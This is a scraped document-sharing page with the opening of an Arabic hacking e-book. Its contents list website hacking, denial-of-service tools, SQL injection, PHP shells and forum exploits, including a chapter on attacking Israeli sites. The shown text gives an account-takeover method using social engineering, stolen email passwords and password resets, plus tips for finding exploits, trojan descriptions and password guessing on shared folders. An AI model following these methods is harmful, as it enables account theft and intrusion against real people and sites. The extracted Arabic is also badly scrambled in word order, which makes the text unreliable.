Upload
vuongquynh
View
259
Download
23
Embed Size (px)
Citation preview
الياء إلى األلف من إختراق
وجرب الكتاب هذا فى تعبت انا بس ومعك% 100لعيونكم مثلكم عب ال انا يعنى بتاعى بى االيى بغير يوم كل ألنى ذكية ادرة يا تكونى وال بإستمرار
وهمية حسابات كلها حسابى تحددوا تقدر ^^ ما تحياتى
♥^______^المحتويات
المقدمة..12. الفهرس.
3. الهاكر. عن عامة مقدمة4. اإلنترنت. في البحث كيفية
5.) األول. ) الجزء اإلنترنت بشبكات خاصة مفاهيم6.) الثاني. ) الجزء اإلنترنت بشبكات خاصة مفاهيم
7. اإلنترنت. عبر األمن8. الشبكات. أمن
9. المواقع. اختراق في للمبتدئين مهمة مصطلحات10. للمبتدئين. المواقع اختراقببرنامج. .11 Webcrackاإلختراق
ببرنامج. .12 MungaBungaاإلختراقالمواقع. 13 تدمير .WinSmurfبرنامج
برنامج. 14 .Evil Pingشرح المواقع لتدمير15. المواقع. لتدمير الدرة برنامج
16. برامج. بدون المواقع تدمير17. التلنت.
عن. 18 .DNSمعلوماتعن. 19 .Routing in the Internetمعلومات
20 .NETBIOS.خدمة. 21 .Fingerبروتوكول
22 .Net. االمر بإستخدام الشبكة إلدارة مختصر شرح23. الـ. secure shellشرح
الـ. .24 معنى Buffer Overflowsشرح.CGIالـ. 25 باإلنترنت وعالقتها
26.! أفعالك؟. وتخفي نفسك تحمي كيف27. ) ؟؟. ) األول الجزء النت في الهوية مجهول تبقى كيف28. ) ؟؟. ) الثاني الجزء النت في الهوية مجهول تبقى كيف.HTTP Portبرنامج. 29 ! ! متخفيا النت تتصفح يجعلك الذي
برنامج. .30 NeoTraceشرح31. شبكة. أو موقع عن المعلومات بجمع القيام كيفية
32. الثغرات. عن للبحث سكان عمران برنامج33.) األول. ) الجزء اليونيكود طريق عن اإلختراق34.) الثاني. ) الجزء اليونيكود طريق عن اإلختراق
35. اليونيكود. ثغرات من االستفادة كيفية عن عامة معلوماتسيرفر. 36 إلختراق الكامل .IISالدليل
الـ. .37 في وبعمق مفصلة UniCodeدراسة38. اليونيكود. بواسطة اإلختراق عملية على تدريب39. المجانية. المواقع اختراق لكيفية مفصل شرح
40. الكوكيز. عن درسمفصلاألسطورة. 41 برنامج .God Willشرح الصفحات تلغيم في
ببرنامج. 42 ومرحبا األسطورة للبرنامج .NOOP4وداعا43. بيج. الفرونت تدعم التي المواقع عن مهمة معلومات
44. بيج. الفرونت تدعم التي المواقع اختراق45. العشوائي. اإلختراق
46. المواقع. اختراق في والمثلى الصحيحة الطريقة47. المواقع. اختراق كيفية عن ومبسطة يسيرة نبذه
48. )> & للمبتدئين. )> المواقع اختراق في ج س.CgiScanerبرنامج. 49 الثغرات عن للبحث
في. 50 المفتوحة المنافذ لمعرفة سكان سوبر برنامج شرحالمواقع.
برنامج. 51 .Shadow Scan Securityشرح الموقع لتحليل52. التشغيل. أنظمة في الباسورد ملف وجود اماكن
53.) األول. ) الجزء الموقع اختراق54.) الثاني. ) الجزء المواقع اختراق55.) الثالث. ) الجزء المواقع اختراق
56.) متوسط. ) المواقع اختراق درسفيملف. 57 .htaccessشرح
الملفات. .58 نقل FTPنظامطريق. .59 عن FTPاإلختراق
الـ. 60 .SQLاختراق61. الـ. عن SQLدرسمفصل
62. المواقع. اختراق في الهاك درسإلحتراف63. المواقع. اختراق لينكسفي استغالل
64. لينكس. طريق عن المواقع اختراق في درساخرمن. 65 مفصل المواقع الياء إلى األلف شرح اختراق احتراف في
. لينكس طريق عنالـ. 66 (.PHP Shellدرسعن األول ) الجزءالـ. 67 (.PHP Shellدرسعن الثاني ) الجزءالـ. 68 (.PHP Shellدرسعن الثالث ) الجزء
أداة. 69 .anmapشرح70. ثغرات. بدون السيرفرات إلقتحام طريقة
71 .Cross Site Scripting.72. الزوار. سجل تدمير كود
73. صفحة. فايروسفي وضع74. الثغرااات.
75. الثغرات. عن مفصل شبه شرح76. الثغرات. تستخدم كيف
77. الثغرة. هذه مع اإلسرائيلية المواقع بإختراق تمتع78. نيوك. ثغرة
.Chunkedثغرة. 7980. المنتديات. حماية
نوع. 81 من المنتديات .vBulletin2,2,0اختراق82. حمايتها. وطرق المنتديات اختراق كيفية عن درسمفصل
منتديات. 83 في .vBulletin 2,2,9ثغرةمنتديات. 84 .phpbb 2.0.0اختراق
في. 85 .php nukeثغرة86. للهاك. العربية والمواقع المنتديات أفضل
87. اإلنجليزية. والهاك األمن مواقع أفضل88. الخاتمة.
الهاكر " هم "منبرامج احدى بمساعدة الغير ألجهزة اشخاصمخترقون هم الهكرز
عملية تسهل مساندة برامج على إعتماد المشهورة االختراق. بالباتشاوالسيرفر تسمى الحاسبين بين االتصال
- اإلنترنت؟؟ مواقع اختراق يتم كيفالنت عالم في واالبحار البحث الي الكثيرين دفع الذي السؤال هذا
مجانية مواقع توفر التي والسرفرات الصفحات من انواع هناكاالول النوع
موقعك باسوورد تتذكر لم او نسيت واذا ببياناتك تحتفظ سيرفراتالشخصية بياناتك منك تطلب سوف فانها
مثل انت اال يعلمها ال التي السريةالكامل الحقيقي اسمك
وميالدك عمركانت بلد اي من
آخر سيرفر الي سيرفر من الدقة وتختلفالثاني النوع
فانها نسيته او الباسوورد اضعت واذا ببياناتك تحتفظ سيرفراتعليه مكتوب ايكون علي الضغط فقط منك تطلب
)) الباسوورد)) نسيتالخاصبك االيميل الي الباسوورد يرسلون ثم ومن
................. ..................................................الشخصواستطعت بيانات عرفت اذا اختراقه يسهل النوع هذا
بياناته تعرف ان وما لبق وباسلوب الطرق بشتي معه التحدثعلي والضغط الخاصه صفحته الي تذهب ان يمكنك حتي الشخصية
الخاصة البايانات وادخال الباسوورد نسيت انك ايكونالباسوورد ... تغيير ثم ومن
والسرية الخاصة الصفحة صاحب بيانات وتغيير..........................
الثاني النوعتمتلك ان التستطيع فانك الباسوورد سرقة حاولت مهما النوع هذا
الباسوورد اليه ترسل سوف الشركة الن طويلة لمدة الصفحةالجديد .. .. ورقمه الباسوورد سيعرف هنا ومن الجديد
أخري !!! مره الموقع او الصفحة الي ملكيته اعادة وسيتم
؟؟ )) الحل كيف اذاهو .. الحل
الباسوورد تعرف وحين به الخاص االيميل باسوورد تعرف انللموقع الباسوورد نسيت انك وكتابة الشركة الي الذهاب سيمكنك
للموقع .. .. بالباسوورد سرقته الذي االيميل علي اخطارك فسيتم. بسالم وانت وملكيته سرقتة يمكنك هنا ومن
انتهى،،،" اإلنترنت" في البحث كيفية
> اإلسالمية> الحزم شبكة منتديات من منقول> : هنتر> بالك الكاتب
؟ االنترنت في البحث كيفيةفي ايشيء او ما مشكلة عن او ما برنامج عن نسمع عندما
؟؟ ذلك يتم كيف عنها البحث ونريد االنترنتبالك فما منتدى في بالبحث يقوم ان يقدر ال الشباب ان نجد غالبا
ال ولكن يبحث تجده وقد ؟ االنترنت في عنها البحث تريد بمسئلهالبحث ليسفي والخطأ بنتيجه يحصل
البحث طريقة في بل
تريد ما الى الوصول في تساعدك حتى البحث محركات صنعتمنها لكل البحث محركات ان تعلم ان عليك ولكن ممكن وقت باقصر
ولكن عامه انها العلم مع عمل؟؟ النتائج هي ما
كتبت ماذا يعرف فهو الذكي المحرك اعتبره انا للجوجل مثال بالنسبهتريدها التي غالبا وهي االولى النتائج يعطيك فلذلك
يقدم انه حيث بحت تجاري ذكائه ولكن ذكي ايضا هو للياهو بالنسبهالمحرك معها يتعامل والتي تريد ما تقدم التي التجاريه المواقع لك
يتعامل ال التي التجاريه المواقع ثماحيانا انت ترده ما وهي العامه المواقع ثم المحرك معها
وضحت المسئله ان اعتقد
اخطط ان علي يجب مثال ما برنامج عن ابحث ابغى انا اخوان ياكيف تتعلم انت الزم واسئل المنتديات الى اذهب ان قبل للبحث
تبحثمن المعلومه هيجيبلك اللي االنسان وبين بينك الفرق وش
ذلك اعتقد ال ؟؟؟ دماغه على ريشه يملك هل ؟ المنتدىاعتقد ال ايضا ؟ للغايه بطئيه وانت للغايه سريعه لديه االنترنت هل
لبعض بالنسبه فشلها اثبتت العاليه السرعات ان العلم مع ذلكاالشخاص
توظفعقولها كيف تعرف ال التي
وكان الخليج في عربيه بدوله لي صديق مع حديث في مره كنت
كامله سنه لي االن انا بالك اخ يا والله لي ويقول بصراحه يحدثنياالنترنت على
خط وبسرعة ISDNمع بباندويث محدد برامج 256غير من اعرف والاتاك الهاك غير االختراق
غير تعرف وال هذه الضاربه القوه ومعك كامله سنه تحطمت انا فعالواالفالم االغاني مواقع بين ما وقتك اكيد انت قلتلله ؟ اتاك الهاك
انا هو هذا ايوالله قال والشات لها لود والداونشيء كل ليست السرعه ان ايقنت فعال وبذلك
تستطيع ال الذي فالسالح السرعه يملك من عقلية شي اهمينفع - ال . استخدامه هـ- ا
للبحث : التخطيط كيفية بشرح سنقوم االن
المواقع تقسيم عبر وهي جدا بسيطه طريقهتجاريه مواقع
ليونكس )) - (( ويندوز برامج مواقعملتيميديا مواقع
واخباريه سياسيه مواقعهاك مواقعكراك مواقع
سكيوريتي مواقعهاردوير مواقع
منتدياتعالم )) (( لوحده هذا جوجل بحث محرك
الخ ..... مواقع
عنه نبحث ما لنأخذ االن
في مثال ابحث اروح وشيخليني ؟ جدا بسيطه ؟ برنامج مثالوشيخليني حتى او ؟؟؟؟ عام بمحرك ابحث وشيخليني ؟؟؟ الياهو
؟؟؟ بالقوقل ابحث اروحدي زد امثال البرامج مواقع الى فورا انطلق برنامج انه بما خالص
موقع - - - لليونكسفهناك وبالنسبه وغيرها لود داون اتاك ويب نتللويندوز برامجه في لود داون موقع من اقوى انه اعتبره انا
المواقع )) تلك كل ساضع الموضوع اخر فريشميت موقع وهوكمرجع ((
لم ال ؟ العمل انتهى هل ؟ افعل ماذا البرنامج اجد ولم بحثت ان بعدبقرائه وابدا تريد ما عن وابحث الجوجل الى اذهب بعد ينتهي
الصفحه هذه تحوي ماذا يخبرك النوتسالذياليها ادخل تريد ما وجدت واذا
ما )) عمري انا عليه تدور اللي هتالقي ما انك اعتقد ما ؟؟ تجد لمماذا (( ؟ تجد لم انك لنفرض ولكن اريد ما واجد اال هالطريقه سويت
وابحث المنتديات الى اذهب ؟ ستفعلبالمنتدى السوال بامكانك وقتها تجد واذالم تسأل ان قبل
عنه تبحث انت اللي عارف منت انت مثال اخرى نقطة نقطه هذهبالظبط
في موجوده عارف ماني ولكن نوعها عارف ثغره على ادور انا مثال وش
الـ ثغرات مثال اختصارها Cross Site Scripteولتكن او XSSوالليCSS
؟؟؟ وشاسوي مثال اكسبلويت على ادور الثغره على ادور ما اناكلمة عن ابحث السكيوريتي لمواقع اوال كل XSSاذهب هيطلعللك
الجوجل الى اذهب نفسالوقت وفي تريد فيما ابحث ابدا عنها شيوابحثعن مثال
XSS مواقع زي مو والجوجل بعينه شي ابغى انا يكفي ال هذا ولكنولذلك بالوي هيجيب الجوجل ال بسيط هتجيبشي السكيوريتي
عالمه ) + ( عبر البحث بتحديد علي
ان فعلي الثغره باسم وادور اكسبلويت وادور بجز ادور انا يعنياكتب :
XSS+BUG+EXPLOITثغرات ادور هاكتب :IISمثال
IIS+exploit+bug
انه شي اهم عنها تبحث اللي المسئله عن شي كل يطلعللك خليهعنه تبحث ما في مواضيع يجيبلك
تجد لم اذا تريد ما عن الكتابه ثم ومن المنتديات ثم ومنللبحث التخطيط بالنقطه شي اهم
رتب ليونكس؟ واال ويندوز ؟ ببرنامج يتعلق موضوع ؟ ابحث ماذا عنالبحث : ابدا المواقع
ابدا : المواقع رتب ؟ بالشوبرينج يتعلق موضوع ؟ ابحث ماذا عنالبحثوهكذا
جدا تفيدكم المواقع من مجموعه لكم ساضع االنجوجل : /http://www.google.com الملك
ومتقدمه : عاديه بحث http://www.yahoo.com/ - http://www محركات.altavista.com/ - http://www.lycos.com/ - http://hotbot.lycos.com/
اوديو : )) المورفيساو او الكازا مثثل برامجها عبر ملتيميديا مواقعاس (( ام وين او شهره kazaa - WinMXجاالكسي االكثر
واخباريه : سياسيه http://news.bbc.co.uk/hi/arabic/news - ht مواقعtp://arabic.cnn.com/ - http://www.aljazeera.net/
سكيوريتي : http://www.securiteam.com/ - http://www.securi مواقعtyfocus.com/ - http://www.ussrback.com/ - http://
www.ntbugtraq.com/ -http://www.ntsecurity.nu/ - http://www.ntsecurity.com/
هاردوير : http://nvidia.com/ - http://www.asus.com/ - http://d مواقعrivers.on-line.net.nz/ - http://intel.com/ - http://www.amdmb.com/
2.") األول" ) الجزء األنترنت بشبكات خاصة مفاهيم> منقول>
> : الوقيت> عصام الكاتبكل فيه يجد عالم بالمتعة، مليء بالفائدة، مليء عالم اإلنترنت
. ولكن األشخاص واختالف االهتمام مجاالت باختالف يهمه، ما إنسانمن البد أنه إال اإلنترنت في المفيدة األشياء كثرة من الرغم على
" " . يسمون من أو الهاكرز نسميه الكدر هذا الصفو يكدر ما وجود. بعضاألحيان في بالمخترقين
ال أسئلة ؟ نتقيشرهم وكيف ؟ أهدافهم هي وما ؟ الهاكرز هم منالعالم، أنحاء مختلف في المستخدمين أكثر رأس في دارت أنها بدسواء الهاكرز أذى طالهم الذين المستخدمين أولئك سيما وال
أهون في أو محتوياتها إتالف أو أجهزتهم من معلومات بسرقة. وإرعابهم إخافتهم األحوال
كوسيلة القارئ، أخي لك نقدمها الحلقات من سلسلة الطيب الهاكريتعلموا لكي مختلفمستوياتهم على المستخدمين لكل تعليميةالتي الحيل يعرفوا ولكي الهاكرز هؤالء شرور يتقون كيف
. القارئ أخي ستكون باختصار بهم األذى إللحاق الهاكرز يستخدمها .. ستكون بل الشر في مثلهم تكون لن ولكن الهاكرز، هؤالء أحد
. الطيب الهاكر
مقدمة:والمعلومات المهارات بعض لتقديم مخصصة ستكون الحلقة هذه
وهي الهاكرز، شر اتقاء يريد من كل يعرفها أن يجب التي األساسية. اآللي الحاسب شبكات الخاصة والمفاهيم المصطلحات بعض
IPرقم مجرد انها ؟ تحملها التي المدنية األحوال بطاقة الغرضمن ما
. يستحيل بطاقتك على الموجود فالرقم وتعريفك لتمييزك وسيلة. البلد نفس في آخر مواطن ألي تكراره
الشبكات، ناحية من اآللي الحاسب مجال في ينطبق المبدأ نفسمميز رقم جهاز لكل يعطى واحدة بشبكة المرتبطة األجهزة فلتمييز
الرقم وهذا بنفسالشبكة مرتبط آخر جهاز أي في تكراره يستحيلأو الجهاز بعنوان يسمى ما .IPهو
بالشبكة مرتبطا الجهاز يكون والتي الدائمة الشبكات حالة في . يتم مالم دائما للجهاز ثابتا الرقم هذا يكون الشبكة، أسالك بواسطة
الهاتفي االتصال حالة في ولكن دائم، بشكل الشبكة من الجهاز نزعتدخل الذي الخدمة موفر على اتصلت كلما يتغير الجهاز عنوان فإن
. خالله من للشبكةأتصل عندما جهازي عنوان أعرف كيف تتساءل اآلن لعلك
على انقر الوندوز في المهام شريط من جدا سهل األمر باالنترنت؟Start ثمrun أدخل باعتماد. winipcfgثم وندوز تستخدم كنت إذا
" " " اكتب " ثم تشغيل ثم ابدأ اختر العربية .winipcfgاللغة
الـ أرقام IPتوزيعرقم كان لماذا تساءلت وأن سبق هو IPهل 212.33.40.1الخاصبك
الـ 24.5.66.3وليس ارقام تبدأ لماذا تساءلت وأنت سبق وهل ،IP في بالرقم أرقام 212السعودية إن الحقيقة في ؟ آخر رقم وليسبأي
IP " بل " يريد ما يأخذ كل بطريقة أو عشوائية بطريقة توزيعها اليتمأرقام توزيع على تشرف منظمات هناك على IPبالعكسيوجد
معرفة عند الجهة معرفة يتم بحيث الدول داخل والمؤسسات الدول.IPرقم تمتلكه الذي
منظمة على )IANA)Internet Assigned Numbers Authorityتشرفأرقام على IPتوزيع باإلشراف تقوم أنها حيث العالم، مستوى على
من معين جزء عن مسؤولة منظمة كل وتكون فرعية منظمات ثالث: هي الفرعية المنظمات وهذه العالم
وتشرف )ARIN )American Registry for Internet Numbersمنظمة- 1من وأجزاء الكاريبية والمناطق والجنوبية الشمالية أمريكا على
افريقيامنطقة )RIPE )Réseaux IP Européensمنظمة- 2 على وتشرف
افريقيا من وأجزاء األوسط والشرق أوروبا )APNIC )Asia Pasific Network Information Centerمنظمة- 3
آسيا على وتشرف
ارقام توزيع على باإلشراف منظمة كل تحت IPتقوم الواقعة للدول . معرفة من تمكنك بيانات قاعدة منظمة لكل ويوجد اشرافها مجال
رقم بخدمة IPصاحب الخدمة هذه وتسمى تقوم whoisمعين حيثرقم عن IPبإدخال معلومات على وستحصل معينة لمنظمة التابع
هذا يمتلك رقم IPمن صاحب لمعرفة المملكة IPفمثال في معينبالذهاب قم السعودية العربية
رقم http://www.ripe.net/db/whois.html للموقع وستحصل IPوأدخل. الرقم هذا صاحب عن متكاملة معلومات على
الـ IPعائلةالـ رقم أن المعروف كالتالي IPمن أقسام أربعة من يتكون
تتراوح 10.10.10.1 قيمة له تكون أن يمكن األقسام هذه من قسم كلالمجال ) 255و 0بين ليسهذا التي بعضاالستثناءات وجود مع
الجهة( من أقسام ثالثة أول أن معرفته يجب الذي الشيء لذكرها
رقم من بحيث IPاليسرى معين خدمة لمزود محجوزة تكون ما غالباال أرقام جميع الجهة IPتكون من أقسام ثالثة أول بها يتشابه التي
. رقم يحمل الذي الجهاز فمثال الخدمة لنفسمزود تنتمي IPاليسرىرقم 212.26.75.34 يحمل الذي ما IP 212.26.75.201والجهاز غالبا
. الخدمة لنفسمزود ينتميانرقم بواسطة الخدمة مزود رقم ) IPولمعرفة أي آخر IPالثالثي بدون
على ( المشرفة المنظمة موقع زيارة يمكنك اليمنى الجهة من رقمرقم له ينتمي الذي خدمة IPالبلد .whoisواستخدام بها الخاصة
للموقع بالذهاب قم أعاله المثال في الخدمة مزود لمعرفة فمثال،http://www.ripe.net/db/whois.html الرقم في 212.26.75وأدخل
الزر انقر ثم ومن الصفحة في الموجود وستحصل searchالمربع. الخدمة مزود عن المخزنة المعلومات جميع على
Portالمنفذ من واحد كل وأن األبواب من العديد فيه منزال تخيل ؟ المنفذ ماهو
وباب الضيوف الستقبال فباب ، معينة لخدمة مخصص األبواب هذه . على ينطبق المبدأ نفس الخدمات لدخول آخر وباب للخدم آخر
خادم مثل الخدمات من العديد على يحتوي فالجهاز اآللي الحاسبالملفات web serverالويب . ftp serverوخادم تطبيق فكل وغيرها
من نوع وهذا بياناته واستقبال الرسال يستخدمه معين منفذ لديهالمنفذ على تكون ما غالبا الويب خدمة فمثال وخدمة 80التنظيم
المنفذ على تكون عدة 21الملفات على يكون ميتنغ النت وبرنامجمنها . 1720منافذ عندما فبالتالي معين منفذ له يكون تطبيق وكل
ألي الجهاز يعرف فسوف معين منفذ على للجهاز بيانات تأتييقوم الذي التطبيق لهذا بإرسالها ويقوم البيانات هذه تنتمي تطبيق
بمعالجتها.
DNS ؟ ماهوفي مشكلة أي تواجه وال أصدقائك أسماء تتذكر بالطبع أنت
رقما ؟كم هواتفهم أرقام عن ماذا ولكن ذاكرتك من استرجاعهاتستطيع فلن جيدة ذاكرتك كانت مهما عشرة؟ ؟ اثنان ؟ منها تحفظنسيان أن الحقيقة فتبقى فعلت وإن كلها هواتفهم أرقام حفظ
. فكرة جاءت المبدأ هذا من األسماء نسيان من سهولة أكثر األرقامDNS .المفروضأن من كان االنترنت استخدام بداية في أنه حيث
الجهاز عنوان موقع .. IPتحفظ لزيارة فمثال موقع أن CNNلكل يجبمن 207.145.53.10تكتب خبراء www.cnn.com بدال الحظ ثم ومن
قادرة .. غير البشرية فالذاكرة جدا صعبا سيكون ذلك أن الحاسبللـ التوجه تم هنا ومن األرقام من الكثير حفظ عبارة DNSعلى وهو
األجهزة أسماء عن عبارة هي معلومات يحفظ خادم جهاز عنالموقع IPوأرقام اسم بإرسال المستخدمون يقوم حيث بها الخاصة
مزود رقم ) DNSالى بعنوانه عليهم ( IPليرد على فلتدخل به الخاصسيقوم www.cnn.com موقع الذي المستعرض في تكتبها ان يكفي
االسماء لخادم عنوان DNSبإرسالها الى بتحويلها سيقوم والذيالخاصبشبكة الويب خادم مع التخاطب جهازك يستطيع الجهازحتى
... األسماء خادم بأن القول يمكن اختصارا، ان ان اال DNSسي ماهو
االنترنت في االجهزة اسماء فيها بيانات قاعدة على يحتوي جهاز.IPوأرقام بها الخاصة
netstatاألمر وبين جهازك بين تخاطب هناك يكون أن المستحيل من بأنه تعلم هلرقم الجهازين من كل لدى يكون أن بدون اإلنترنت في آخر جهاز أي
من IPالـ نوع أي نقل هو بالتخاطب وأقصد اآلخر؟ بالجهاز الخاصإلىشخصمعين. رسالة ترسل فلكي ضروري شيء هذا البيانات
يقوم لكي عنوانك يعرف أن أيضا هو ويجب عنوانه تعرف أن فيجب. . وقتها في عنها سنتحدث استثناءات عدة هناك بالطبع عليك بالرد
باالتصال التخاطب هذا يسمى الشبكات نظام طبعا. connectionفيويسمى االتصال بطلب يقوم من هناك يكون أن يجب اتصال لكل
أو ويسمى Clientعميل عليه االتصال يتم من أيضا هناك ويكون.serverمزود
األجهزة جميع بمعرفة لك الدوسيسمح نظام في أمر هناكالبيانات ) واستقبال بارسال جهازك يقوم التي أو بجهازك المتصلة
المتفذ( ) ومعرفة ) portمنها هي( المنفذ فائدة االتصال عليه تم الذي ) األمر هو األمر وهذا عليه االتصال تم الذي التطبيق ما netstatتحديد
بتشغيل تقوم أن إال برامج ms-dos promptعليك قائمة منprograms هذه بكل قائمة على وستحصل األمر هذا اكتب ثم ومن
. الجهازين كال في االتصال عليه تم الذي المنفذ مع األجهزة
Internet Relay Chat( IRCالمحادثة )محادثة مزود وجود هي المحادثة نظام عمل chat serverطريقة
محادثة برنامج شخص chat clientووجود أراد إذا بحيث جهاز كل فيبدوره والذي ، المحادثة برنامج بتشغيل يقوم للمحادثة الدخول . الشخص يتمكن االتصال إجراء وبعد المحادثة بمزود باالتصال يقوم
أيضا يمكنه كما المزود في الموجودة الغرف من ألي الدخول منالوظائف من بالعديد القيام أيضا يمكنه كما به، الخاصة الغرف انشاء
. لذكرها المجال ليسهذا التييعرف معه بالتخاطب جهازك يقوم جهاز كل أن السابق في قلنا
الـ بالشكل IPرقم الكالم هذا يفهم ال أن يجب ولكن الخاصبك،المحادثة نظام في فمثال بمزود IRCالخاطيء باالتصال أنت تقوم
المستخدمين، chat serverالمحادثة لجميع بالنسبة الحال وكذلكاألشخاص جميع وبين بينك كالوسيط المزود هذا يكون بحيث
برنامج يقوم لشخصما، رسالة بإرسال تقوم فلكي به، المتصلينيقوم بدوره والذي المحادثة لمزود الرسالة بإرسال المحادثة
أي وبين بينك مباشر اتصال يوجد ال فإنه للشخصوبالتالي بإرسالهاالمحادثة برامج أن تالحظ ولها المحادثة، نظام خالل شخصآخر
رقم تعطيك ما التالي ) IPغالبا بالشكل ناقصا اآلخرين لألشخاص111.222.333.XXX ) ال حتى للمستخدمين الحماية من نوع فيه وهذا
الـ رقم معرفة من الهاكرز ثم IPيتمكن ومن للمستخدم الكامل. إليه للوصول استخدامه
نظام في شخصآخر ألي يمكن حيث النظام، لهذا استثناءان هناكرقم معرفة :IPالمحادثة , كالتالي وهما الخاصبك الكامل
بها. 1 دخلت التي الغرفة على الشخصمشرفا كون حالة فيمنحه) تم الذي الشخص أو الغرفة أنشأ الذي الشخص هو المشرف
) على يحصل المشرف أن حيث ، الغرفة أنشأ من قبل من الصالحيةالـ .IPرقم غرفته شخصدخل لكل الكامل
2 : فمزود. المحادثة نظام شخصفي مع الملفات تبادلك حالة فيحالة في أما النصوصفقط، نقل في الوسيط بدور يقوم المحادثة
الـ رقم الجهازين كال بإعطاء يقوم فإنه الملفات الخاص IPنقل. مباشر بشكل بينهما البيانات بنقل يقومان بحيث اآلخر بالجهاز
مخصصة تكون التي للغرف الدخول من احذر أعاله، ذكر مما ) على ) سيحصل الغالب في هاكر وهو المشرف أنه حيث للهاكرز،
. IPرقم وأيضا االختراق لخطر يعرضجهازك مما مباشرة الخاصبكيعرضعليك ممن أو تعرفهم ال ممن الملفات استقبال من احذر
الحصول يكون ربما الوحيد غرضه ألن سبب، بدون الملفات إرسال. الخاصبك بي اآلي رقم على
؟ الموقع صاحب منهو من نفسك في وتساءلت وأعجبك، موقعا زرت قد أنك البد
) تحتار ) ألن داعي ال مؤسسة أو شخصا كان سواء الموقع هذا صاحبللموقع تذهب أن فيكفي اآلن -www.networksolutions.com/cgi بعد
bin/whois/whois / دون من الموقع اسم بإدخال مثل ) wwwوتقومwagait.com ) بتسجيل قام الذي الشخص اسم على وستحصل
من والفاكسوغيرها هاتفه ورقم البريدي وعنوانه الموقع . قد المعلومات فهذه بالطبع بالموقع المتعلقة األخرى المعلومات
. الموقع اسم بحجز قام عندما بإدخالها الموقع صاحب قامإنتهى .
") الثاني" ) الجزء اإلنترنت بشبكات خاصة مفاهيمهو ما تعرف أن أوال يجب خطر أي من نفسك تحمي كيف تعرف لكي
من نفسك تحمي كيف تعرف أن بإمكانك يصبح ثم ومن الخطر هذانعرف أن يجب اللصوص، من أنفسنا نحمي لكي فمثال الخطر، هذانقفل. فنحن شرهم، نتقي كيف نعرف أن يجب ثم ومن خطرهم
تركناها حال في منها يدخلون اللصوصقد أن لمعرفتنا األبوابكيف. تعرف فلكي اآللي، للحاسب بالنسبة الحال هو كذلك مفتوحة
يقومون كيف تعرف أن يجب الهاكرز، شرور من نفسك تحمي. أجهزتنا إلى منها يدخلون التي األبواب هي وما جهازك، باختراق
الشبكات، ومفاهيم بعضمصطلحات عن تكلمنا السابقة الحلقة فيوهي الحلقة هذه في عنه سنتحدث ما معرفة على تساعدك والتي ) بعملية ) القيام من الهاكرز المخترقين تمكن التي والبرامج الطرق
هذا كان سواء اإلنترنت، لشبكة المستخدمين ألجهزة االختراقالتخريب لغرض أو الملفات التجسسوسرقة لغرض االختراق
. نذكر ولن تلميحا، البرامج لهذه سنلمح فإننا بالطبع الملفات ومسح. استغاللها إساءة يتم ال حتى وذلك أسماءها
(:Virusesالفيروسات- )1تتوجه اآللي، الحاسب في الموجودة األخطار عن التحدث يتم عندما
النتشارها نظرا الفيروسات، في للتفكير تلقائيا المستمعين أذهان . من ولعله اآللي الحاسب أجهزة على التخريبية تأثيرها وقوة
عدم المناسب) الكل ) يكن لم إن فالغالبية الفيروسات، عن الحديث في اإلطالة
. المستخدمين أجهزة على وتأثيرها خطرها يعرفون
(:Trojansالتروجان- )2أنها ظاهرها في يكون التي البرامج هي طروادة أحصنة أو التروجان
وخلف الحقيقة في ولكنها للمستخدم مفيدة وظيفة بأداء تقوم ) علم ) بدون مخربة غالبا أخرى وظيفة بعمل الكواليستقوم
نظرا. اإلنترنت، في بكثرة النوعية هذه انتشرت وقد المستخدممن للمخترقين تعطيه لما ونظرا بها المستخدم انخداع لسهولةجهاز في الكامل شبه التحكم إلى بعضاألحيان في تصل إمكانيات
. الضحية المستخدمالمسماة التروجان اإلنترنت في المنتشرة التروجان أشهر من لعل
" باس " نت " " NetBusبـ اوريفيس باك سب "Back Orificeو ويقوم . SubSevenسيفين " أن وهي متشابهة عملها وطريقة
يقوم والتي الملفات أحد في التروجان بإخفاء المخترقتقوم الملفات هذه بأن منهم ظنا بسحبها اآلخرون المستخدمون
فإنه الملف هذا بتنفيذ المستخدم يقوم وعندما لهم، مفيدة بوظائفيتمكن بحيث جهازه داخل للتروجان خادم بتركيب علمه وبدون يقوم
للتروجان ) عميل برنامج باستخدام في( clientالمخترق التحكم من. الضحية المستخدم جهاز
القيام من المخترق تمكن التي الوظائف في التروجان هذه تتشابهمثل ) الجهاز التجسسعلى الوظائفمن خطورة وتتراوح بها، ) حتى المختلفة السر وكلمات اإللكتروني والبريد الملفات سرقة
المضغوطة ) األقراص بإخراج المستخدم بجهاز أو( CD-ROMالعبثمن وغيرها ملفصوت تشغيل أو للمستخدم مضحكة رسالة إظهار
. المزعجة األخرى الوظائف
المختلفة الوظائف فيها باسويظهر نت برنامج واجهة تبين صورةبها القيام للهاكر يمكن التي
3: ويندوز- في والملفات الطباعة في المشاركةأحد بتحديد للمستخدم يسمح ويندوز نظام أن المعروف منأشخاص قبل من للمشاركة جهازه في الصلبة األقراص أو المجلدات . ولها جدا مفيدة الخاصية هذه فإن بالطبع الشبكة على آخرين
متصال تكون عندما ولكن للمستخدم، نافعة كثيرة تطبيقاتالمجلدات هذه يرى أن سيستطيع جهازك يرى من كل فإن باإلنترنت
هو عليها للدخول الوحيد العائق ويبقى للمشاركة وضعتها التي " . اآلخرون يستطيع كيف تتساءل قد طبعا السر كلمة على الحصول
" اإلنترنت على األجهزة من الماليين ضمن جهاز وأنا ؟ لي الوصولفلن ) قلنا وكما البرامج من الكثير يتوافر أنه لك أقول أن يؤسفنيللشخصمن ( تمكن والتي استخدامها يساء ال حتى أسماءها نذكر
. المستخدمين أجهزة في للمشاركة الموضوعة المجلدات عن البحثأن إال المخترق على ما فإنه األجهزة بهذه قائمة على الحصول وبعد
( " ويوجد " السر كلمة تخمين بمحاولة يقوم برنامج بتشغيل يقوم ) آالف بتجريب تقوم والتي النوع هذا من البرامج من الكثير أيضاكلمة إلى تصل ملفحتى في مسبقا تخزينها تم والتي الكلمات
. أن بلة الطين يزيد وما للمشاركة الموضوع بالمجلد الخاصة السربكامله !! الصلب القرص بمشاركة يقومون المستخدمين بعض
مما !! حرفين أو حرف من بسيطة سر كلمة يستخدم وبعضهميسرق الملفات أي في يحتار ويجعله الهاكر على المهمة يسهل
يترك !! وأيها
المشاركة الموضوعة المجلدات عن بالبحث تقوم التي البرامج أحد
4: المخزنة- السر كلمة سرقةلكي وذلك ملف في السر كلمة بتخزين ويندوز نظام يقوم
يتم السر كلمة فإن بالطبع إليها، الحاجة حالة في بسرعة يسترجعها( مشفر بشكل على ( encryptedتخزينها يستعصي شيء ال ولكن ،
